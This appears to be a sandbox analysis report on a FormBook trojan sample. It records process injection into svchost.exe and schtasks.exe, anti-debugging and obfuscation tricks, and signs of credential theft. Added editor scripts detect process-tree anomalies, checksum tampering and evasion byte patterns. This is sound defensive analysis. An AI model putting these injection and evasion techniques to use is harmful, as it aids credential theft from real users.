            Source: 00000002.00000002.2374964402.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/10
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0044AF5C GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
            Source: C:\Users\user\Desktop\BL.exe | File created: C:\Users\user\AppData\Local\Temp\fricandeaux
            Source: C:\Users\user\Desktop\BL.exe | Command line argument: #v | 0_2_0040D7F0
            Source: BL.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\BL.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\BL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: schtasks.exe, 00000004.00000002.4642699238.0000000002762000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2598450225.0000000002741000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2604983043.000000000276D000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.0000000002791000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2598805537.0000000002762000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: BL.exe | ReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\BL.exe | File read: C:\Users\user\Desktop\BL.exe
            Source: unknown | Process created: C:\Users\user\Desktop\BL.exe "C:\Users\user\Desktop\BL.exe"
            Source: C:\Users\user\Desktop\BL.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BL.exe"
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
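            The process creation lines above already carry the report's strongest injection evidence: svchost.exe is started by a Desktop executable with a command line that names BL.exe rather than svchost.exe, schtasks.exe (a command-line tool that never spawns children) is started with an empty argument list and later launches Firefox, and the pdb strings further down show schtasks.pdb inside svchost.exe memory and svchost.pdb inside schtasks.exe memory. The Python script below is an added example by the editor, not part of the Joe Sandbox report and not FormBook code: it parses the four Process created lines (copied as constructed input, with the source and event columns separated by " | ") and applies four parent/child rules. The rule tables and the finding names are the editor's assumptions about what is normal on a Windows host, not sandbox signatures.

```python
import re
from pathlib import PureWindowsPath

# Constructed input: the four "Process created" lines of this report, copied
# with the source and event columns separated by " | ".
REPORT_LINES = [
    r'Source: unknown | Process created: C:\Users\user\Desktop\BL.exe "C:\Users\user\Desktop\BL.exe"',
    r'Source: C:\Users\user\Desktop\BL.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\BL.exe"',
    r'Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"',
    r'Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"',
]

LINE_RE = re.compile(
    r'^Source: (?P<parent>.+?) \| Process created: (?P<image>.+?) '
    r'"(?P<argv0>[^"]*)"(?P<args>.*)$'
)

# Rule tables (editor's assumptions about a normal Windows host).
LEAF_UTILITIES = {"schtasks.exe"}   # CLI tools that do not spawn children
SERVICE_HOSTS = {"svchost.exe"}     # legitimately started only by services.exe


def name_of(path: str) -> str:
    """Case-folded file name of a Windows path ('unknown' stays 'unknown')."""
    return PureWindowsPath(path).name.lower()


def parse(lines):
    """Turn report lines into dicts with parent, image, argv0 and args."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def analyze(events):
    """Return (child image name, rule) pairs for every suspicious creation."""
    findings = []
    for ev in events:
        image, parent = name_of(ev["image"]), name_of(ev["parent"])
        # Mapped image and argv[0] disagree: one file was loaded but the
        # command line names another, the classic hollowing footprint.
        if image != name_of(ev["argv0"]):
            findings.append((image, "image-cmdline-mismatch"))
        if image in SERVICE_HOSTS and parent != "services.exe":
            findings.append((image, "svchost-parent-not-services"))
        if parent in LEAF_UTILITIES:
            findings.append((image, "leaf-utility-spawned-child"))
        if image in LEAF_UTILITIES and not ev["args"].strip():
            findings.append((image, "utility-started-without-arguments"))
    return findings


if __name__ == "__main__":
    for child, rule in analyze(parse(REPORT_LINES)):
        print(f"{child:14s} {rule}")
```

            Run against the report's four lines it flags svchost.exe twice (image/command-line mismatch, parent is not services.exe), schtasks.exe once (started without arguments) and firefox.exe once (child of a leaf utility); BL.exe itself produces no finding, which is the expected shape for a dropper that does its work through injected system processes.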
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\BL.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\BL.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\schtasks.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: BL.exe | Static file information: File size 1313649 > 1048576
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.2343149641.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339549263.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.000000000088B000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4643317474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OmmtmfniIsg.exe, 00000003.00000000.2294008987.000000000048E000.00000002.00000001.01000000.00000004.sdmp, OmmtmfniIsg.exe, 00000006.00000000.2452423712.000000000048E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: BL.exe, 00000000.00000003.2200803339.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, BL.exe, 00000000.00000003.2201628438.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2278099897.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2276121714.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.000000000359E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2381659246.000000000296E000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2383829839.0000000002B14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: BL.exe, 00000000.00000003.2200803339.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, BL.exe, 00000000.00000003.2201628438.0000000004630000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2278099897.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2276121714.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374651538.000000000359E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000004.00000002.4646369641.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000002.4646369641.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2381659246.000000000296E000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000004.00000003.2383829839.0000000002B14000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000004.00000002.4648172740.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000026CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2711959587.000000000FE0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.2343149641.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339549263.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000003.2308910777.000000000088B000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000003.00000002.4643317474.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000004.00000002.4648172740.00000000032EC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000004.00000002.4642699238.00000000026E3000.00000004.00000020.00020000.00000000.sdmp, OmmtmfniIsg.exe, 00000006.00000002.4645986744.00000000026CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2711959587.000000000FE0C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress
            Source: BL.exe | Static PE information: real checksum: 0xa2135 should be: 0x148887
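            A stored PE checksum that disagrees with the recomputed value (0xa2135 in the header against 0x148887 for the file on disk) means the file was changed after the linker wrote the field, which is what packing, patching or appending a payload does; a field left at zero is not a finding, since linkers only fill it for drivers and signed system images by default. The script below is an added example by the editor, not code from the report or the sample. It recomputes the checksum with the algorithm behind CheckSumMappedFile: a one's-complement style sum over the whole file (done 32 bits at a time, as pefile does, which gives the same value as the 16-bit form), skipping the CheckSum field, folded to 16 bits, plus the file length. So that it runs offline it builds a minimal constructed PE32 image with a deliberately wrong CheckSum; pass a file path to check a real sample. It assumes e_lfanew is 4-byte aligned, which linkers produce.

```python
import struct
import sys


def checksum_field_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum: 64 bytes into the
    optional header for both PE32 and PE32+, and the optional header starts
    24 bytes after the PE signature pointed to by e_lfanew."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew + 24 + 64


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute the image checksum the way CheckSumMappedFile does."""
    padded = data + b"\x00" * (-len(data) % 4)   # trailing bytes count as zero-padded
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue                              # the field itself is excluded
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:                    # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)      # fold to 16 bits
    total += total >> 16
    return (total & 0xFFFF) + len(data)           # plus the original file length


def verify_checksum(data: bytes):
    """Return (stored, computed); a non-zero stored value that differs from
    computed means the file was modified after the checksum was written."""
    off = checksum_field_offset(data)
    stored = struct.unpack_from("<I", data, off)[0]
    return stored, pe_checksum(data, off)


def build_demo_pe() -> bytes:
    """Constructed minimal PE32 (not the sample from this report): DOS header
    with e_lfanew = 0x40, PE signature, i386 COFF header with no sections and
    a 96-byte optional header whose CheckSum holds a bogus value."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, 0, 0, 0, 0, 96, 0)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", opt, 64, 0xDEADBEEF)    # deliberately wrong CheckSum
    return bytes(dos) + coff + bytes(opt)


if __name__ == "__main__":
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_pe()
    stored, computed = verify_checksum(image)
    status = "ok" if stored in (0, computed) else "MISMATCH"
    print(f"stored 0x{stored:x} computed 0x{computed:x} {status}")
```

            On the constructed image the stored value 0xdeadbeef is reported against a computed 0xa34c, the same kind of mismatch the static analysis above records for BL.exe. Because the CheckSum field is skipped during summation, rewriting it never changes the computed value, which is why a packer that forgets to update it leaves this trace.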
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_004171D1 push ecx; ret | 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401803 push ds; iretd | 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416033 pushfd ; ret | 2_2_0041609B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408199 pushad ; ret | 2_2_004081C5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00415AF3 push eax; ret | 2_2_00415B63
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041CAFD push ss; retf | 2_2_0041CB05
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417AAE push FFFFFFD9h; ret | 2_2_00417AB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004013E0 push ds; iretd | 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413BEE push 0000003Ah; ret | 2_2_00413C42
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040CB98 push 7D3987A0h; iretd | 2_2_0040CB9D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413C43 push 0000003Ah; ret | 2_2_00413C42
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041E420 push ecx; iretd | 2_2_0041E45E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413C8A push ecx; iretd | 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413D28 push edx; ret | 2_2_00413D64
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413D28 push ecx; iretd | 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413DB0 push ecx; iretd | 2_2_00413DCC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040668E push esi; retf | 2_2_00406692
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402EA0 push eax; ret | 2_2_00402EA2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041EEAC push es; ret | 2_2_0041EEBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413F34 push eax; retf | 2_2_00413FB8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401786 push ds; iretd | 2_2_004017FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413FA5 push eax; retf | 2_2_00413FB8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340225F pushad ; ret | 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034027FA pushad ; ret | 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx | 2_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340283D push eax; iretd | 2_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0340135E push eax; iretd | 2_2_03401369
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Code function: 3_2_033003BA pushad ; ret | 3_2_033003E6
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Code function: 3_2_0330E254 pushfd ; ret | 3_2_0330E2BC
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Code function: 3_2_032FE8AF push esi; retf | 3_2_032FE8B3
            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Code function: 3_2_03316641 push ecx; iretd | 3_2_0331667F
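            The push/ret, push/retf and push/iretd pairs listed for svchost.exe and OmmtmfniIsg.exe are the disassembler's view of return-based control flow: the code pushes its target and "returns" into it instead of using jmp or call, which breaks linear-sweep disassembly and call-graph signatures. The rdtsc and mov eax, dword ptr fs:[00000030h] findings in the anti-debugging part of this report are timing and PEB-based debugger checks from the same injected code. As an added triage aid by the editor (not the report's or the sandbox's code), the script below scans raw bytes for the 32-bit x86 encodings of these constructs and counts them. The byte patterns are the standard encodings and the labels are the example's own; the sample buffer is constructed. Because a byte scan ignores instruction boundaries, its hits are a triage signal, not the disassembly-confirmed counts Joe Sandbox reports.

```python
import re
import sys
from collections import Counter

# Return opcodes that end a gadget: ret (C3), retf (CB), iretd (CF).
RET = rb"[\xC3\xCB\xCF]"

# 32-bit x86 encodings of the constructs the report lists.
PATTERNS = {
    "peb-read-eax":   rb"\x64\xA1\x30\x00\x00\x00",             # mov eax, dword ptr fs:[30h]
    "peb-read-ecx":   rb"\x64\x8B\x0D\x30\x00\x00\x00",         # mov ecx, dword ptr fs:[30h]
    "rdtsc":          rb"\x0F\x31",                             # rdtsc
    "push-imm32-ret": rb"\x68[\x00-\xff]{4}" + RET,             # push imm32 ; ret/retf/iretd
    "push-imm8-ret":  rb"\x6A[\x00-\xff]" + RET,                # push imm8 (sign-extended) ; ret
    "push-reg-ret":   rb"[\x50-\x57\x06\x0E\x16\x1E]" + RET,    # push eax..edi / es / cs / ss / ds ; ret
    "pushad-ret":     rb"\x60" + RET,                           # pushad ; ret
    "pushfd-ret":     rb"\x9C" + RET,                           # pushfd ; ret
}
COMPILED = {name: re.compile(pat) for name, pat in PATTERNS.items()}


def scan(buf: bytes):
    """Return (offset, label) for every hit, sorted by offset."""
    hits = []
    for name, rx in COMPILED.items():
        hits.extend((m.start(), name) for m in rx.finditer(buf))
    return sorted(hits)


def summarize(buf: bytes) -> dict:
    """Per-label hit counts, with zero for labels that did not match."""
    counts = Counter(name for _, name in scan(buf))
    return {name: counts.get(name, 0) for name in PATTERNS}


# Constructed sample bytes (not taken from the analysed binary): a prologue,
# a PEB read of BeingDebugged, rdtsc, and several push/ret-style gadgets.
SAMPLE = (
    b"\x55\x8B\xEC"                    # push ebp ; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"        # mov eax, dword ptr fs:[30h]   (PEB)
    b"\x0F\xB6\x40\x02"                # movzx eax, byte ptr [eax+2]   (PEB.BeingDebugged)
    b"\x0F\x31"                        # rdtsc
    b"\x6A\xD9\xC3"                    # push 0FFFFFFD9h ; ret
    b"\x6A\x3A\xC3"                    # push 3Ah ; ret
    b"\x68\xA0\x87\x39\x7D\xCF"        # push 7D3987A0h ; iretd
    b"\x51\xCF"                        # push ecx ; iretd
    b"\x60\xC3"                        # pushad ; ret
    b"\xC9\xC3"                        # leave ; ret
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for off, name in scan(data):
        print(f"{off:08x}  {name}")
    print(summarize(data))
```

            Point it at an unpacked memory dump of the injected region rather than the packed file on disk; the gadgets only exist in the decrypted payload, which is also why the report attributes them to svchost.exe and OmmtmfniIsg.exe and not to BL.exe.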

            Boot Survival

            Source: C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\SysWOW64\schtasks.exe"
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_004772DE IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\BL.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\schtasks.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 occurrences)

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\BL.exe | Code function: 0_2_00444078
            Source: C:\Users\user\Desktop\BL.exe | API/Special instruction interceptor: Address: 3DDD23C
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\schtasks.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0347096E rdtsc
            Source: C:\Windows\SysWOW64\schtasks.exe | Window / User API: threadDelayed 3422
            Source: C:\Windows\SysWOW64\schtasks.exe | Window / User API: threadDelayed 6550
            Source: C:\Users\user\Desktop\BL.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-86357
            Source: C:\Users\user\Desktop\BL.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep | graph_0-85083
            Source: C:\Users\user\Desktop\BL.exe | API coverage: 3.1 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.6 %
            Source: C:\Windows\SysWOW64\schtasks.exe | API coverage: 2.4 %
            Source: C:\Windows\SysWOW64\schtasks.exe TID: 516 | Thread sleep count: 3422 > 30
